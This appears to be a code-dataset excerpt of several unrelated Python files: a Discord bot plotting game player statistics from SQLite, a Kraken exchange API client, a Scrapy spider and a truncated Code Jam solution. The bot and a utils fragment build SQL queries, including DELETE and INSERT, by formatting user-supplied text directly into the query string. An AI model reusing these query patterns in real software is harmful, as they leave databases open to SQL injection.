will be appended\n l_sp_config = []\n\n configuration_mapping = {\n 'use_raspberry' : 'USE_RASPBERRY',\n 'correct_vertical_camera' : 'CORRECT_VERTICAL_CAMERA',\n 'correct_horizontal_camera' : 'CORRECT_HORIZONTAL_CAMERA',\n 'center_radius' : 'CENTER_RADIUS',\n 'show_center_circle' : 'SHOW_CENTER_CIRCLE',\n 'enable_photo' : 'ENABLE_PHOTO',\n 'enable_video' : 'ENABLE_VIDEO',\n 'record_seconds' : 'RECORD_SECONDS',\n 'threshold' : 'THRESHOLD',\n 'resolution' : 'RESOLUTION',\n 'framerate' : 'FRAMERATE',\n 'sensor_mode' : 'SENSOR_MODE',\n 'shutter_speed' : 'SHUTTER_SPEED',\n 'iso' : 'ISO'\n }\n\n for variable in configuration_mapping.keys():\n if spectro_pointer_config[variable]:\n config_str = f\"{configuration_mapping[variable]}=?\"\n string_sql = sql_stat_build(string_sql, config_str, value_control, l_sp_config, spectro_pointer_config[variable])\n value_control+=1\n\n # Convert list into tuple\n l_sp_config = tuple(l_sp_config)\n \n # Execute UPDATE statement\n conn.execute(string_sql,l_sp_config)\n\n conn.commit()\n conn.close()\n\ndef get_sp_config(param,app):\n with app.app_context():\n g.db = connect_db()\n config_table = g.db.execute('select '+param+' from sp_config')\n result = 0\n try:\n result = config_table.fetchall()[0][0]\n except:\n result = 0\n\n g.db.close()\n return result\n","repo_name":"spectro-pointer/colimador-dinamico","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1305800285","text":"#!/usr/bin/env python3\n#\n# FILENAME: plotty-bot.py\n# CREATED: August 17, 2019\n# AUTHOR: buerge3\n#\n# A discord bot for plotting player and alliance growth\n# Usage: \"python3 ./plotty-bot.py\nimport discord\nfrom discord.ext import commands\nfrom discord import Status\n#from discord.ext.commands import Bot\n\nimport sqlite3\nfrom sqlite3 import Error\n\nimport logging\n\nimport time\nimport datetime\nfrom datetime import timedelta\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib.ticker as tkr\nfrom dateutil import parser\nfrom matplotlib import style\n\n# MODIFIABLE PARAMTERS\ndb_name = \"LVE.db\"\ntoken_file = \"secret_plotty.txt\"\nimg_save_name = \"latest-plotty.png\"\nBOT_PREFIX = (\"!\",\"?\")\nbot = commands.Bot(command_prefix=BOT_PREFIX)\n\n# -----------------------------------------------------------------------------\n# DATABASE CONNECTION SCRIPT\n# -----------------------------------------------------------------------------\ndef create_connection(db_file):\n \"\"\" create a database connection to the SQLite database\n specified by the db_file\n :param db_file: database file\n :return: Connection object or None\n \"\"\"\n try:\n conn = sqlite3.connect(db_file)\n logging.info(\"connected to \" + db_file);\n return conn\n except Error as e:\n logging.error(e, exc_info=True)\n \n return None\n\n\nconn = create_connection(db_name)\n\n\n# -----------------------------------------------------------------------------\n# FUNCTIONS\n# -----------------------------------------------------------------------------\n# init_logger\n# initialize the logger to output msgs of lv INFO or higher to the console,\n# and write messages of DEBUG or higher to a log file\ndef init_logger():\n logfile_name = datetime.datetime.now().strftime(\"%d-%m-%Y_%I-%M-%S_%p\")\n #logging.basicConfig(filename='logs/'+logfile_name, filemode='w', format='[%(asctime)s] %(levelname)s: %(message)s')\n logFormatter = logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s')\n rootLogger = logging.getLogger()\n rootLogger.setLevel(logging.DEBUG)\n fileHandler = logging.FileHandler(\"{}/{}.log\".format('logs', logfile_name))\n fileHandler.setFormatter(logFormatter)\n fileHandler.setLevel(logging.DEBUG)\n rootLogger.addHandler(fileHandler)\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logFormatter)\n consoleHandler.setLevel(logging.WARNING)\n rootLogger.addHandler(consoleHandler)\n\n\n# -----------------------------------------------------------------------------\n# DISCORD BOT COMMANDS & EVENTS\n# -----------------------------------------------------------------------------\n@bot.command(brief=\"Plot the growth of a player\", description=\"Plot the growth of a single player. To compare the growth of different players, use the \\\"players\\\" command\", aliases=[\"plot\", \"plot-one\"])\nasync def player(ctx, ppl : str):\n cur = conn.cursor()\n\n sql = '''SELECT key FROM alias WHERE name=\"{}\"'''.format(ppl.lower())\n logging.debug(\"SQL: \" + sql)\n cur.execute(sql)\n res = cur.fetchone()\n key = -1\n if res is None or len(res) == 0:\n msg = \"**[WARNING]** The player \" + ppl + \" does not exist. Please check your spelling and try again.\"\n logging.warning(msg)\n await ctx.send(msg)\n return\n else:\n key = res[0]\n #cur.execute(\"SELECT * FROM test1 WHERE Name=?\", str(ppl))\n sql1 = '''SELECT Date, Lv, Power FROM LVE WHERE PlayerKey=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(str(key))\n logging.debug(\"SQL: \" + sql1)\n cur.execute(sql1)\n\n value_list = cur.fetchone()\n if value_list is None or len(value_list) == 0:\n msg = \"**[WARNING]** The player \" + ppl + \" does not have any data.\"\n logging.warning(msg)\n await ctx.send(msg)\n return\n\n sql2 = '''SELECT name FROM display WHERE key=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(str(key))\n logging.debug(\"SQL: \" + sql2)\n cur.execute(sql2)\n default_name = cur.fetchone()\n\n title = ppl;\n alias_list = [];\n if default_name is not None:\n if (default_name[0].lower() == ppl.lower()):\n title = default_name[0];\n else:\n alias_list.append(default_name[0].lower())\n\n sql3 = '''SELECT name FROM alias WHERE key=\"{}\" ORDER BY ROWID DESC'''.format(str(key))\n logging.debug(\"SQL: \" + sql3)\n cur.execute(sql3)\n list_o_names = cur.fetchall()\n if list_o_names is not None:\n if (list_o_names[0][0].lower() != title.lower() and list_o_names[0][0] not in alias_list):\n alias_list.append(list_o_names[0][0])\n if (list_o_names[-1][0].lower() != title.lower() and list_o_names[-1][0] not in alias_list):\n alias_list.append(list_o_names[-1][0])\n if (len(list_o_names) > 2 and list_o_names[-2][0].lower() != title.lower() and list_o_names[-2][0] not in alias_list):\n alias_list.append(list_o_names[-2][0])\n alias_string = \", \".join(alias_list)\n if (len(list_o_names) > 4):\n alias_string += \"... (+%s more)\" % (len(list_o_names) - len(alias_list) - 1)\n #else:\n #print(\"list_o_names is %d long\" % len(list_o_names))\n if (len(alias_list) > 0):\n alias_string = \"\\n Also known as: \" + alias_string\n\n #msg = ''.join(str(v) for v in value_list)\n #msg = \"The power of \" + ppl + \" is \" + msg;\n msg = \"**%s**\\n Last Updated: %s\\n Lv: %s\\n Power: %s\" % (title, value_list[0], value_list[1], '{:,}'.format(value_list[2]))\n\n # get growth rates:\n sql4 = '''SELECT Lv, Power, Date FROM LVE WHERE PlayerKey=\"{}\" AND Date>\"{}\" ORDER BY DATE DESC'''.format(str(key), datetime.datetime.now() - datetime.timedelta(days=8))\n logging.debug('SQL: ' + sql4)\n cur.execute(sql4)\n result = cur.fetchall()\n if result is not None and len(result) > 3:\n num_entries = len(result)\n power_change = result[0][1] - result[-1][1]\n growth_per_day = float(power_change) / num_entries\n growth_per_week = growth_per_day * 7\n percent_growth_per_week = growth_per_week / result[-1][1]\n msg += \"\\n Growth: %s (%s) per week\" % (human_format(growth_per_week), '{:.2%}'.format(percent_growth_per_week))\n\n msg += alias_string;\n\n # get lve fam birthday\n sql5 = '''\n SELECT Date, Lv\n FROM [LVE] A\n INNER JOIN\n (\n SELECT Alliance, MIN(Date) AS minDate\n FROM [LVE]\n GROUP BY Alliance\n ) B ON A.Alliance = B.Alliance\n INNER JOIN\n (\n SELECT PlayerKey, MIN(Date) AS minDate\n FROM [LVE]\n GROUP BY PlayerKey\n ) C ON\n A.PlayerKey=\"{}\" AND\n A.PlayerKey = C.PlayerKey AND\n julianday(B.minDate, '+2 days') < julianday(C.minDate) AND\n A.Date = C.minDate\n '''.format(str(key))\n logging.debug(\"SQL: \" + sql5)\n cur.execute(sql5)\n birthday = cur.fetchone()\n if (birthday is not None):\n msg += \"\\n LVE Birthday: joined on %s when lv %d\" % (birthday[0], birthday[1])\n\n\n\n logging.info(msg)\n\n\n dates = []\n values = []\n\n sql = '''SELECT Date, Lv, Power FROM LVE WHERE PlayerKey=\"{}\" AND julianday(Date, '+1 month') > julianday('now', 'localtime') '''.format(str(key))\n logging.debug(\"SQL: \" + sql)\n cur.execute(sql)\n\n value_list = cur.fetchall()\n\n for row in value_list:\n dates.append(parser.parse(row[0]))\n values.append(row[2])\n\n async with ctx.message.channel.typing():\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_subplot(111)\n line, = ax.plot(dates, values, lw=2)\n fig.autofmt_xdate()\n ax.set_title(\"Growth of \" + ppl + \" for this Month\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Power\")\n ax.get_yaxis().set_major_formatter(\n tkr.FuncFormatter(lambda x, p: format(int(x), ',')))\n plt.savefig(img_save_name, bbox_inches=\"tight\")\n plt.close()\n\n await ctx.send(msg, file=discord.File(img_save_name))\n\n@bot.command(brief=\"Plot the growth of multiple players\", description=\"Plot the growth of the specified players on a single graph\", aliases=[\"players\", \"plot-many\", \"plot-several\", \"plot-multiple\", \"plot-players\"])\nasync def compare(ctx, *argv):\n args = [];\n for arg in argv:\n args.append(arg)\n\n cur = conn.cursor()\n\n async with ctx.message.channel.typing():\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_subplot(111)\n for i in range(len(argv)):\n ppl = argv[i]\n key = -1\n sql = '''SELECT key FROM alias WHERE name=\"{}\"'''.format(ppl.lower())\n logging.debug(\"SQL: \" + sql)\n cur.execute(sql)\n res = cur.fetchone()\n if res is None:\n msg = \"**[WARNING]** The player \" + ppl + \" does not exist. Please check your spelling and try again.\"\n logging.warning(msg)\n await ctx.send(msg)\n continue\n else:\n key = res[0]\n sql = '''SELECT Date, Lv, Power FROM LVE WHERE PlayerKey=\"{}\" AND julianday(Date, '+1 month') > julianday('now', 'localtime')'''.format(str(key))\n logging.debug(\"SQL: \" + sql)\n cur.execute(sql)\n value_list = cur.fetchall()\n dates = []\n values = []\n for row in value_list:\n dates.append(parser.parse(row[0]))\n values.append(row[2])\n line, = ax.plot(dates, values, lw=2, label=argv[i])\n\n fig.autofmt_xdate()\n ax.set_title(\"Power of \" + str(len(argv)) + \" Players this Month\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Power\")\n ax.get_yaxis().set_major_formatter(\n tkr.FuncFormatter(lambda x, p: format(int(x), ',')))\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.savefig(img_save_name, bbox_inches=\"tight\")\n plt.close()\n\n await ctx.send(file=discord.File(img_save_name))\n\n'''\n@bot.command(description=\"Plot the growth of a single alliance. To compare the growth of different alliances, use the \\\"alliances\\\" command\")\nasync def alliance(ctx, name):\n cur = conn.cursor()\n #cur.execute(\"SELECT * FROM test1 WHERE Name=?\", str(ppl))\n cmd = \"SELECT Date, count(*), SUM(Power) FROM LVE WHERE alliance=\" + name + \" GROUP BY Date ORDER BY Date DESC LIMIT 1\"\n cur.execute(cmd)\n\n value_list = cur.fetchone()\n #msg = ''.join(str(v) for v in value_list)\n #msg = \"The power of \" + ppl + \" is \" + msg;\n msg = \"**\" + name + \"**\\n Last Updated: %s\\n Number of Players: %s\\n Total Power: %sk\" % value_list \n logging.info(msg);\n\n dates = []\n values = []\n\n cmd = \"SELECT Date, SUM(Power) FROM LVE WHERE alliance=\" + name + \" GROUP BY Date ORDER BY Date\"\n cur.execute(cmd)\n\n value_list = cur.fetchall()\n\n for row in value_list:\n dates.append(parser.parse(row[0]))\n values.append(row[1])\n\n\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_subplot(111)\n line, = ax.plot(dates, values, lw=2)\n fig.autofmt_xdate()\n ax.set_title(\"Power of \" + name)\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Power (in thousands)\")\n plt.savefig('latest.png', bbox_inches=\"tight\")\n plt.close()\n\n await ctx.send(content=msg, file=discord.File(img_save_name))\n\n@bot.command(description=\"Plot the growth of multiple alliances in one chart\")\nasync def alliances(*argv):\n args = [];\n for arg in argv:\n args.append(arg)\n\n cur = conn.cursor()\n\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_subplot(111)\n for i in range(len(argv)):\n cur.execute(\"SELECT Date, SUM(Power) FROM LVE WHERE alliance=\" + argv[i] + \" GROUP BY Date ORDER BY Date\")\n value_list = cur.fetchall()\n dates = []\n values = []\n for row in value_list:\n dates.append(parser.parse(row[0]))\n values.append(row[1])\n line, = ax.plot(dates, values, lw=2, label=argv[i])\n\n fig.autofmt_xdate()\n ax.set_title(\"Power of \" + str(len(argv)) + \" Alliances\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Power (in thousands)\")\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.savefig('latest.png', bbox_inches=\"tight\")\n plt.close()\n\n await ctx.send(file=discord.File(img_save_name))\n'''\n@bot.command(brief=\"Plot the growth of all players in an alliance\", description=\"Plot the growth of all players in an alliance within an optionally specified level range on a single graph\", aliases=[\"plot-alliance\", \"plot-all\"])\nasync def alliance(ctx, team : str, min=1, max=40):\n\n cur = conn.cursor()\n\n sql = '''SELECT PlayerKey FROM LVE WHERE Alliance=\"{}\" AND Date>date(\"now\",\"-2 days\") AND Lv>=\"{}\" AND Lv <=\"{}\" GROUP BY PlayerKey ORDER BY Power DESC'''.format(team.lower(), str(min), str(max))\n logging.debug('SQL: ' + sql)\n cur.execute(sql)\n query_res = cur.fetchall()\n\n if query_res is None or len(query_res) == 0:\n msg = \"**[WARNING]** No results found for team {}\".format(team)\n logging.warning(msg)\n await ctx.send(msg)\n return\n\n async with ctx.message.channel.typing():\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_subplot(111)\n for key in query_res:\n sql3 = '''SELECT name FROM display WHERE key=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(key[0])\n logging.debug('SQL: ' + sql3)\n cur.execute(sql3)\n get_name = cur.fetchone()\n\n if not get_name:\n sql3 = '''SELECT Name FROM alias WHERE key=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(key[0])\n logging.debug('SQL: ' + sql3)\n cur.execute(sql3)\n get_name = cur.fetchone()\n sql = '''SELECT Date, Lv, Power FROM LVE WHERE PlayerKey=\"{}\" AND julianday(Date, '+1 month') > julianday('now', 'localtime')'''.format(str(key[0]))\n logging.debug(\"SQL: \" + sql)\n cur.execute(sql)\n value_list = cur.fetchall()\n dates = []\n values = []\n for row in value_list:\n dates.append(parser.parse(row[0]))\n values.append(row[2])\n line, = ax.plot(dates, values, lw=2, label=get_name[0])\n\n fig.autofmt_xdate()\n ax.set_title(\"Power of \" + str(len(query_res)) + \" Players this Month\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Power\")\n ax.get_yaxis().set_major_formatter(\n tkr.FuncFormatter(lambda x, p: format(int(x), ',')))\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.savefig(img_save_name, bbox_inches=\"tight\")\n plt.close()\n\n await ctx.send(file=discord.File(img_save_name))\n\ndef human_format(num):\n magnitude = 0\n while abs(num) >= 1000:\n magnitude += 1\n num /= 1000.0\n # add more suffixes if you need them\n return '%.2f%s' % (num, ['', 'k', 'M', 'G', 'T', 'P'][magnitude])\n\n@bot.command(brief=\"Assign a display name\", description=\"Designate the case-sensitive display name of a player\", aliases=[\"make-default\", \"set-default\", \"make-name\", \"set-name\", \"make-display\", \"set-display\"])\nasync def name(ctx, name : str):\n cur = conn.cursor()\n sql = '''SELECT key FROM alias WHERE name=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(name.lower())\n logging.debug('SQL: ' + sql)\n cur.execute(sql)\n key = cur.fetchone()\n\n if not key:\n msg = \"**[ERROR]** The name {} does not exist. Try adding it first by doing !add\".format(name)\n logging.error(msg)\n await ctx.send(msg)\n return\n\n sql = '''DELETE FROM display WHERE key=\"{}\"'''.format(key[0])\n logging.debug('SQL: ' + sql)\n cur.execute(sql)\n\n sql = '''INSERT INTO display (key, name) VALUES (\"{}\", \"{}\")'''.format(key[0], name)\n logging.debug('SQL: ' + sql)\n cur.execute(sql)\n\n conn.commit()\n\n msg = 'Set \\'' + name + '\\' as the player display name'\n logging.info(msg)\n await ctx.send(msg)\n\n\n@bot.command(brief=\"Display the roster\", description=\"Display the roster with active/inactive status for the given team\")\nasync def roster(ctx, team : str, options='-g'):\n '''\n COMMAND OPTIONS:\n -n or -a = sort my name/alphabetically\n -p = sort by power\n -g = sort by growth\n '''\n num_insufficient = 0;\n num_active = 0;\n num_inactive = 0;\n total_growth = 0;\n total_percent_growth = 0;\n roster_msg = \"\";\n cur = conn.cursor()\n\n\n sql = '''SELECT PlayerKey FROM LVE WHERE Alliance=\"{}\" AND Date>date(\"now\",\"-2 days\") GROUP BY PlayerKey'''.format(team.lower())\n '''if options == \"-n\" or options == \"-a\":\n # DON'T KNOW HOW TO IMPLEMENT THIS YET\n elif (options == \"-p\"):\n sql += \" ORDER BY Power DESC\"\n elif (options == \"-g\"):\n # NOT SURE KNOW HOW TO IMPLEMENT THIS YET'''\n sql += \" ORDER BY Power DESC\"\n logging.debug('SQL: ' + sql)\n cur.execute(sql)\n query_res = cur.fetchall()\n\n async with ctx.message.channel.typing():\n\n for key in query_res:\n sql2 = '''\n SELECT Power, Date\n FROM [LVE] A\n WHERE PlayerKey=\"{}\"\n AND Power NOT IN (\n SELECT Power\n FROM (\n SELECT MAX(Date) AS max, Power\n FROM [LVE] B\n WHERE B.PlayerKey = A.PlayerKey\n )\n )\n ORDER BY Date DESC\n LIMIT 1\n '''.format(key[0])\n logging.debug('SQL: ' + sql2)\n cur.execute(sql2)\n recent = cur.fetchone()\n\n sql3 = '''SELECT name FROM display WHERE key=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(key[0])\n logging.debug('SQL: ' + sql3)\n cur.execute(sql3)\n get_name = cur.fetchone()\n\n if not get_name:\n sql3 = '''SELECT Name FROM alias WHERE key=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(key[0])\n logging.debug('SQL: ' + sql3)\n cur.execute(sql3)\n get_name = cur.fetchone()\n\n sql4 = '''SELECT Lv, Power, Date FROM LVE WHERE PlayerKey=\"{}\" AND Date>\"{}\" ORDER BY DATE DESC'''.format(key[0], datetime.datetime.now() - datetime.timedelta(days=8))\n logging.debug('SQL: ' + sql4)\n cur.execute(sql4)\n result = cur.fetchall()\n\n num_entries = len(result)\n\n if num_entries < 3:\n # Case insufficent data\n msg = \"```🆕 Name: {:25}| Level: {:<3}| Power: {:<8}| Insufficient data, only {} entries this week ```\".format( get_name[0] , result[0][0], human_format(result[0][1]), num_entries)\n num_insufficient += 1\n\n elif recent and ( datetime.datetime.strptime(recent[1], \"%Y-%m-%d\") + datetime.timedelta(days=14) ) >= datetime.datetime.now() :\n # Case active\n power_change = result[0][1] - result[-1][1]\n growth_per_day = float(power_change) / num_entries\n growth_per_week = growth_per_day * 7\n #percent_growth_per_day = growth_per_day / recent[0];\n percent_growth_per_week = growth_per_week / result[-1][1]\n\n msg = \"```🌿 Name: {0:<25}| Level: {1:<3}| Power: {2:<8}| Active, growing {3} ({4:.2%}) per week ```\".format( get_name[0] , result[0][0], human_format(result[0][1]), human_format(growth_per_week), percent_growth_per_week)\n num_active += 1\n total_growth += growth_per_week\n total_percent_growth += percent_growth_per_week\n\n else :\n # Case inactive\n last_seen = \"\"\n if (recent):\n last_seen = recent[1]\n else:\n last_seen = \"never\"\n msg = \"```🕒 Name: {:<25}| Level: {:<3}| Power: {:<8}| Inactive, last seen {} ```\".format( get_name[0], result[0][0], human_format(result[0][1]), last_seen)\n num_inactive += 1\n\n #roster_msg += msg + \"\\n\"\n logging.info(msg)\n await ctx.send(msg)\n\n num_players = num_active + num_inactive + num_insufficient\n if num_players == 0:\n msg = \"No data has been uploaded for team {} today\".format(team)\n logging.info(msg)\n await ctx.send(msg)\n return\n #overview_msg = \"active players {} out of {}\\n\".format(num_active + num_insufficient, num_players)\n #overview_msg += \"the average member grows {0} ({1:.2f}%) per week\\n\".format(human_format(total_growth/num_players), total_percent_growth/num_players)\n #overview_msg += \"the average active member grows {} ({}%} per week\".format(total_growth/num_players, total_percent_growth/num_players)\n embed=discord.Embed(title=\"Team {} Summary\".format(team.upper()), color=0x00ff00)\n #embed.add_field(name=\"OVERVIEW\", value=overview_msg, inline=False)\n #embed.add_field(name=\"ROSTER ({}):\".format(num_players), value=roster_msg, inline=False)\n embed.add_field(name=\"Player Count ({})\".format(num_players), value='''{} Active, {} Inactive, {} New'''.format(num_active, num_inactive, num_insufficient), inline=False)\n embed.add_field(name=\"Weekly Growth\", value='''{0} ({1:.2f}%) per Player'''.format(human_format(total_growth/num_players), total_percent_growth/num_players), inline=False)\n await ctx.send(\"Done.\", embed=embed)\n\n\n\n@bot.event\nasync def on_ready():\n logging.info(\"Logged in as \" + bot.user.name)\n\n@bot.event\nasync def on_command_error(ctx, error):\n msg = \"**[ERROR]** %s\" % (error)\n logging.error(msg)\n await ctx.send(msg)\n raise\n\n# ------------------------------------------------------------------------------\n# MAIN SCRIPT\n# ------------------------------------------------------------------------------\ninit_logger()\nstyle.use ('fivethirtyeight')\nf = open(token_file, \"r\")\nTOKEN = f.read()\nbot.run(TOKEN)\n","repo_name":"buerge3/STFC_Sqlite_Discord_Bot","sub_path":"plotty-bot.py","file_name":"plotty-bot.py","file_ext":"py","file_size_in_byte":22195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"36121978015","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport hmac\nimport json\nimport requests\n\nfrom time import time_ns\nfrom hashlib import sha256, sha512\nfrom urllib.parse import urlencode\nfrom base64 import b64encode, b64decode\n\nfrom slay_the_kraken.kraken.exceptions import KrakenError\n\n\nclass API(object):\n \"\"\"Represents an instance that communicates with the kraken exchange.\"\"\"\n # Private:\n _api_key: str = ''\n _api_secret: str = ''\n _api_version: str = '0'\n _timeout: float = 5.0\n _json_options: dict = {}\n\n # Public:\n api_url: str = 'https://api.kraken.com'\n session: requests.Session = requests.Session()\n respons: requests.Response = requests.Response()\n\n def __init__(self) -> None:\n self._load_keys()\n\n def _load_keys(self) -> None:\n \"\"\"Load keys from the .env directory into memory.\"\"\"\n with open('slay_the_kraken/env/api_keys.json', 'r') as myfile:\n api_keys_data = json.load(myfile)\n self._api_key: str = api_keys_data['KRAKEN_API_KEY']\n self._api_secret: str = api_keys_data['KRAKEN_API_SECRET']\n\n def _nonce(self) -> int:\n \"\"\"An ever increasing value as unique identifier.\"\"\"\n return int(time_ns())\n\n def _query(self, url: str, headers: dict, data: dict, timeout: float) -> dict:\n \"\"\"Wrapper around a simple request.\"\"\"\n url: str = self.api_url + url\n self.response = self.session.post(url, headers=headers, data=data, timeout=timeout)\n if self.response.status_code not in (200, 201, 202):\n self.response.raise_for_status()\n response_json = self.response.json(**self._json_options)\n kraken_api_error = response_json['error']\n if kraken_api_error:\n raise KrakenError(kraken_api_error)\n return response_json\n\n def _signature(self, url_path: str, data: dict) -> str:\n \"\"\"Sign and hash the given data.\"\"\"\n nonce = str(data['nonce'])\n data_encoded = urlencode(data)\n # Unicode-objects must be encoded before hashing\n encoded = (nonce + data_encoded).encode()\n message = url_path.encode() + sha256(encoded).digest()\n signature = hmac.new(b64decode(self._api_secret), message, sha512)\n sigdigest = b64encode(signature.digest())\n return sigdigest.decode()\n\n def close(self):\n \"\"\"Close the connection to the exchange.\"\"\"\n self.session.close()\n\n def public_query(self, method: str, data: dict) -> dict:\n \"\"\"Query without having to sign.\"\"\"\n url: str = '/' + self._api_version + '/public/' + method\n return self._query(url, headers={}, data=data, timeout=self._timeout)\n\n def private_query(self, method: str, data: dict) -> dict:\n \"\"\"Query with having to sign.\"\"\"\n url: str = '/' + self._api_version + '/private/' + method\n data['nonce'] = self._nonce()\n headers: dict = {'API-Key': self._api_key, 'API-Sign': self._signature(url, data)}\n return self._query(url, headers=headers, data=data, timeout=self._timeout)\n\n def Balance(self) -> dict:\n \"\"\"Returns the account balance.\"\"\"\n result: dict = self.private_query('Balance', data={})\n return result\n\n def OHLC(self, pair: str, interval: int = 5) -> dict:\n \"\"\"Return the open-high-low-close data for a given asset.\"\"\"\n intervals: list[int] = [1, 5, 15, 30, 60, 4*60, 24*60, 7*24*60, 15*24*60] # in minutes\n if interval not in intervals:\n interval = 1\n return self.public_query('OHLC', data={'pair': pair, 'interval': interval})\n","repo_name":"simonaertssen/SlayTheKraken","sub_path":"slay_the_kraken/kraken/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41788169805","text":"# -*- coding: utf-8 -*-#\nfrom __future__ import division, absolute_import, unicode_literals\n\nfrom .treehouse import TreeHouseProductsSpider\nfrom scrapy.http import Request\nimport urlparse\n\nfrom scrapy.log import INFO\nfrom product_ranking.items import SiteProductItem\nfrom product_ranking.utils import valid_url\n\n\nclass TreeHouseShelfPagesSpider(TreeHouseProductsSpider):\n name = 'treehouse_shelf_urls_products'\n allowed_domains = ['tree.house']\n\n def __init__(self, *args, **kwargs):\n kwargs.pop('quantity', None)\n self.num_pages = int(kwargs.pop('num_pages', 1))\n\n super(TreeHouseShelfPagesSpider, self).__init__(*args, **kwargs)\n\n def start_requests(self):\n yield Request(url=valid_url(self.product_url),\n meta={'search_term': '', 'remaining': self.quantity})\n\n def _scrape_product_links(self, response):\n links = response.xpath(\n '//div[contains(@class, \"product-grid-item\")]//a[@class=\"grid-image\"]/@href'\n ).extract()\n\n if links:\n for link in links:\n link = urlparse.urljoin(response.url, link)\n yield link, SiteProductItem()\n else:\n self.log(\"Found no product links in {url}\".format(url=response.url), INFO)\n\n def _scrape_next_results_page_link(self, response):\n return None","repo_name":"aprosdev/ecom-predictor","sub_path":"product-ranking/product_ranking/spiders/treehouse_shelf_pages.py","file_name":"treehouse_shelf_pages.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23392957191","text":"\r\ninputFile = 'input.txt'\r\ninputFile = 'C-small-attempt0.in'\r\noutputFile = 'output.txt'\r\n\r\nf = open(inputFile, 'rb')\r\ninputs = f.readlines()\r\nf.close()\r\n\r\ntotal = int(inputs[0])\r\ncount = 1\r\n \r\ni = 1\r\nresult = ''\r\n\r\ndef calc1(a):\r\n if a == 0:\r\n return 0\r\n if a == 1:\r\n return 3\r\n if a == 2:\r\n return 2\r\n return calc1(a-2)*2\r\ndef calc2(a):\r\n if a == 0 or a == 1:\r\n return 0\r\n if a == 2:\r\n return 1\r\n if a % 2 == 1:\r\n return calc2(a-2) + 2\r\n else:\r\n return calc2(a-2) + 1\r\ndef calc(a, b, intA):\r\n result = 0\r\n isEqual = False\r\n if a == 1:\r\n if intA >= 0:\r\n result +=1;\r\n isEqual = intA==0\r\n if intA >= 1:\r\n result +=1;\r\n isEqual = intA==1\r\n if intA >= 4:\r\n result +=1;\r\n isEqual = intA==4\r\n if intA >= 9:\r\n result +=1;\r\n isEqual = intA==9\r\n return (result, isEqual)\r\n \r\n if b==1:\r\n result = 4\r\n else:\r\n result = calc1(b)+calc1(b-1)+calc2(b)+calc2(b-1)\r\n cpA = ['0' for i in range(a)]\r\n i = int(a/2)\r\n j = 0\r\n subA = ['0','1','2']\r\n subB = ['0','1']\r\n \r\n if a % 2 == 1:\r\n while (j < i and i > 0):\r\n cpA[j] = '1'\r\n cpA[-j-1] = '1'\r\n for sub in subA:\r\n cpA[i] = sub\r\n if int(''.join(cpA)) * int(''.join(cpA)) <= intA:\r\n isEqual = intA==int(''.join(cpA)) * int(''.join(cpA))\r\n result += 1\r\n else:\r\n \r\n return (result, isEqual)\r\n j+=1\r\n if a % 2 == 0:\r\n while((j==0 or j < i-1) and i > 0):\r\n \r\n cpA[j] = '1'\r\n cpA[-j-1] = '1'\r\n for sub in subB:\r\n cpA[i] = sub\r\n cpA[i-1] = sub\r\n if i-1 == j and sub == '0':\r\n continue\r\n if int(''.join(cpA)) * int(''.join(cpA)) <= intA:\r\n isEqual = intA==int(''.join(cpA)) * int(''.join(cpA))\r\n result += 1\r\n else:\r\n return (result, isEqual)\r\n j+=1\r\n \r\n cpA = ['0' for i in range(a)]\r\n cpA[0] = '2'\r\n cpA[-1] = '2'\r\n \r\n if a % 2 == 1:\r\n cpA[int(a/2)] = '1'\r\n if int(''.join(cpA)) * int(''.join(cpA)) <= intA:\r\n isEqual = intA==int(''.join(cpA)) * int(''.join(cpA))\r\n return (result + 2, isEqual)\r\n else:\r\n cpA[int(a/2)] = '0'\r\n if int(''.join(cpA)) * int(''.join(cpA)) <= intA:\r\n isEqual = intA==int(''.join(cpA)) * int(''.join(cpA))\r\n return (result + 1, isEqual)\r\n else:\r\n return (result,isEqual)\r\n else:\r\n if int(''.join(cpA)) * int(''.join(cpA)) <= intA:\r\n isEqual = intA==int(''.join(cpA)) * int(''.join(cpA))\r\n return (result + 1, isEqual)\r\n else:\r\n return (result,isEqual)\r\n \r\n return (result,isEqual)\r\n\r\n\r\ndef test(a, b):\r\n lenA = (len(str(a)) + 1) / 2\r\n lenB = (len(str(b)) + 1) / 2 \r\n \r\n## lastLenA = len(str(a)) /2\r\n## lastLenB = len(str(b)) /2\r\n numA,equalA = calc(lenA, lenA-1, a)\r\n numB,equalB = calc(lenB, lenB-1, b)\r\n\r\n if equalA:\r\n return numB - numA + 1\r\n else:\r\n return numB - numA \r\n\r\nwhile i < 